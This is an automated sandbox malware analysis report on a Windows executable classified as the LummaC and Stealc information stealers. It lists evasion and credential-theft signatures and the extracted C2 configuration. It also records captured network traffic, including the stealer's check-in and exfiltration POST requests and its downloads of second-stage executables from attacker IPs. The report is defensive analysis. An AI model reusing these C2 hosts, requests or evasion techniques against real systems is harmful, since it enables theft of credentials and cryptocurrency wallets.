Windows Analysis Report
s31ydU1MpQ.exe

Overview

General Information

Sample name: s31ydU1MpQ.exe
renamed because original name is a hash value
Original sample name: d96503971b338f5b4db28e9f306a1fad.exe
Analysis ID: 1579679
MD5: d96503971b338f5b4db28e9f306a1fad
SHA1: 2b75e6f5537b01ae1fdc43fbc666b4cb300e50cc
SHA256: c1ddf685bda82f05dd6c3730103fcd0c7bba4d2ef14fcca5e57c622db31873b5
Tags: exeuser-abuse_ch
Infos:

Detection

LummaC, Stealc
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Disable Windows Defender notifications (registry)
Disable Windows Defender real time protection (registry)
Disables Windows Defender Tamper protection
Found many strings related to Crypto-Wallets (likely being stolen)
Hides threads from debuggers
LummaC encrypted strings found
Machine Learning detection for dropped file
Machine Learning detection for sample
Modifies windows update settings
PE file contains section with special chars
Potentially malicious time measurement code found
Query firmware table information (likely to detect VMs)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks for debuggers (devices)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to detect virtual machines (SIDT)
Contains long sleeps (>= 3 min)
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Entry point lies outside standard sections
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Searches for user specific document files
Shows file infection / information gathering behavior (enumerates multiple directory for files)
Sigma detected: Use Short Name Path in Command Line
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

RansomwareSpreadingPhishingBankerTrojan / BotAdwareSpywareExploiterEvaderMinercleansuspiciousmalicious
Name Description Attribution Blogpost URLs Link
Lumma Stealer, LummaC2 Stealer Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
Name Description Attribution Blogpost URLs Link
Stealc Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

AV Detection

barindex
Source: s31ydU1MpQ.exe Avira: detected
Source: C:\Users\user\AppData\Local\Temp\BGXAMSUR4L24WR8IH77.exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: BGXAMSUR4L24WR8IH77.exe.484.11.memstrmin Malware Configuration Extractor: StealC {"C2 url": "185.215.113.206/c4becf79229cb002.php", "Botnet": "stok"}
Source: s31ydU1MpQ.exe.6440.0.memstrmin Malware Configuration Extractor: LummaC {"C2 url": ["sweepyribs.lat", "rapeflowwj.lat", "aspecteirs.lat", "necklacebudi.lat", "sustainskelet.lat", "grannyejh.lat", "energyaffai.lat", "crosshuaht.lat", "discokeyus.lat"], "Build id": "PsFKDg--pablo"}
Source: s31ydU1MpQ.exe Virustotal: Detection: 52% Perma Link
Source: s31ydU1MpQ.exe ReversingLabs: Detection: 60%
Source: Submited Sample Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Users\user\AppData\Local\Temp\HXPC21YC8H3Q6AWWXLQHI1I.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\BGXAMSUR4L24WR8IH77.exe Joe Sandbox ML: detected
Source: s31ydU1MpQ.exe Joe Sandbox ML: detected
Source: s31ydU1MpQ.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown HTTPS traffic detected: 23.55.153.106:443 -> 192.168.2.7:49699 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.7:49700 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.7:49701 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.7:49703 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.7:49709 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.7:49715 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.7:49722 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.7:49730 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.7:49742 version: TLS 1.2
Source: Binary string: E:\defOff\defOff\defOff\obj\Release\defOff.pdb source: HXPC21YC8H3Q6AWWXLQHI1I.exe, 0000000A.00000002.1716963563.0000000000B02000.00000040.00000001.01000000.00000006.sdmp
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe Directory queried: number of queries: 1001

Networking

barindex
Source: Network traffic Suricata IDS: 2058378 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (sweepyribs .lat) : 192.168.2.7:61005 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2058376 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (sustainskelet .lat) : 192.168.2.7:64113 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2058374 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (rapeflowwj .lat) : 192.168.2.7:61568 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2058354 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (aspecteirs .lat) : 192.168.2.7:64003 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2058360 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (discokeyus .lat) : 192.168.2.7:49990 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2058370 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (necklacebudi .lat) : 192.168.2.7:57623 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2058358 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (crosshuaht .lat) : 192.168.2.7:64239 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2058364 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (grannyejh .lat) : 192.168.2.7:63520 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2058362 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (energyaffai .lat) : 192.168.2.7:61904 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.7:49779 -> 185.215.113.206:80
Source: Network traffic Suricata IDS: 2858666 - Severity 1 - ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup : 192.168.2.7:49699 -> 23.55.153.106:443
Source: Network traffic Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.7:49700 -> 104.21.66.86:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.7:49700 -> 104.21.66.86:443
Source: Network traffic Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.7:49709 -> 104.21.66.86:443
Source: Network traffic Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.7:49701 -> 104.21.66.86:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.7:49701 -> 104.21.66.86:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.7:49742 -> 104.21.66.86:443
Source: Malware configuration extractor URLs: 185.215.113.206/c4becf79229cb002.php
Source: Malware configuration extractor URLs: sweepyribs.lat
Source: Malware configuration extractor URLs: rapeflowwj.lat
Source: Malware configuration extractor URLs: aspecteirs.lat
Source: Malware configuration extractor URLs: necklacebudi.lat
Source: Malware configuration extractor URLs: sustainskelet.lat
Source: Malware configuration extractor URLs: grannyejh.lat
Source: Malware configuration extractor URLs: energyaffai.lat
Source: Malware configuration extractor URLs: crosshuaht.lat
Source: Malware configuration extractor URLs: discokeyus.lat
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Mon, 23 Dec 2024 06:28:44 GMTContent-Type: application/octet-streamContent-Length: 2845696Last-Modified: Mon, 23 Dec 2024 06:14:51 GMTConnection: keep-aliveETag: "6768ffdb-2b6c00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 50 28 2c 65 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 24 00 00 00 08 00 00 00 00 00 00 00 a0 2b 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 e0 2b 00 00 04 00 00 df 49 2c 00 02 00 60 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 55 80 00 00 69 00 00 00 00 60 00 00 44 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 81 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 40 00 00 00 20 00 00 00 40 00 00 00 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 44 05 00 00 00 60 00 00 00 06 00 00 00 60 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 20 00 00 00 80 00 00 00 02 00 00 00 66 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 74 6e 72 78 65 63 62 76 00 e0 2a 00 00 a0 00 00 00 de 2a 00 00 68 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 61 6e 61 79 6a 72 67 79 00 20 00 00 00 80 2b 00 00 04 00 00 00 46 2b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 40 00 00 00 a0 2b 00 00 22 00 00 00 4a 2b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Mon, 23 Dec 2024 06:28:49 GMTContent-Type: application/octet-streamContent-Length: 2907648Last-Modified: Mon, 23 Dec 2024 06:16:47 GMTConnection: keep-aliveETag: "6769004f-2c5e00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 20 8b b6 d4 64 ea d8 87 64 ea d8 87 64 ea d8 87 0b 9c 73 87 7c ea d8 87 0b 9c 46 87 69 ea d8 87 0b 9c 72 87 5e ea d8 87 6d 92 5b 87 67 ea d8 87 6d 92 4b 87 62 ea d8 87 e4 93 d9 86 67 ea d8 87 64 ea d9 87 09 ea d8 87 0b 9c 77 87 77 ea d8 87 0b 9c 45 87 65 ea d8 87 52 69 63 68 64 ea d8 87 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 19 64 54 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 96 02 00 00 28 01 00 00 00 00 00 00 90 4f 00 00 10 00 00 00 b0 02 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 c0 4f 00 00 04 00 00 a0 28 2d 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 4d b0 24 00 61 00 00 00 00 a0 24 00 f0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 b1 24 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 90 24 00 00 10 00 00 00 68 01 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 f0 01 00 00 00 a0 24 00 00 02 00 00 00 78 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 b0 24 00 00 02 00 00 00 7a 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 77 77 71 75 66 6e 73 6b 00 c0 2a 00 00 c0 24 00 00 bc 2a 00 00 7c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 64 75 74 6a 71 6a 71 6e 00 10 00 00 00 80 4f 00 00 04 00 00 00 38 2c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 90 4f 00 00 22 00 00 00 3c 2c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JEBKKEGDBFIIEBFHIEHCHost: 185.215.113.206Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4a 45 42 4b 4b 45 47 44 42 46 49 49 45 42 46 48 49 45 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 42 30 34 46 44 41 38 36 38 45 37 33 30 39 39 33 30 35 32 31 35 0d 0a 2d 2d 2d 2d 2d 2d 4a 45 42 4b 4b 45 47 44 42 46 49 49 45 42 46 48 49 45 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 73 74 6f 6b 0d 0a 2d 2d 2d 2d 2d 2d 4a 45 42 4b 4b 45 47 44 42 46 49 49 45 42 46 48 49 45 48 43 2d 2d 0d 0a Data Ascii: ------JEBKKEGDBFIIEBFHIEHCContent-Disposition: form-data; name="hwid"AB04FDA868E73099305215------JEBKKEGDBFIIEBFHIEHCContent-Disposition: form-data; name="build"stok------JEBKKEGDBFIIEBFHIEHC--
Source: Joe Sandbox View IP Address: 104.21.66.86 104.21.66.86
Source: Joe Sandbox View IP Address: 23.55.153.106 23.55.153.106
Source: Joe Sandbox View IP Address: 185.215.113.206 185.215.113.206
Source: Joe Sandbox View IP Address: 185.215.113.206 185.215.113.206
Source: Joe Sandbox View ASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
Source: Joe Sandbox View JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49699 -> 23.55.153.106:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49701 -> 104.21.66.86:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49703 -> 104.21.66.86:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49709 -> 104.21.66.86:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49700 -> 104.21.66.86:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49715 -> 104.21.66.86:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49722 -> 104.21.66.86:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49730 -> 104.21.66.86:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49742 -> 104.21.66.86:443
Source: Network traffic Suricata IDS: 2019714 - Severity 2 - ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile : 192.168.2.7:49748 -> 185.215.113.16:80
Source: global traffic HTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: lev-tolstoi.com
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 47Host: lev-tolstoi.com
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=S0XVJK104JSM607OUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 12832Host: lev-tolstoi.com
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=TI11QG7SJ91AKH1KW5User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15076Host: lev-tolstoi.com
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=NERBL1ALI8S6T2VM9User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20395Host: lev-tolstoi.com
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=0UA00PMMTMJ08TAXUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1223Host: lev-tolstoi.com
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=W8TZCONWVG75XA8IUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 558918Host: lev-tolstoi.com
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 82Host: lev-tolstoi.com
Source: global traffic HTTP traffic detected: GET /off/def.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET /steam/random.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: global traffic HTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
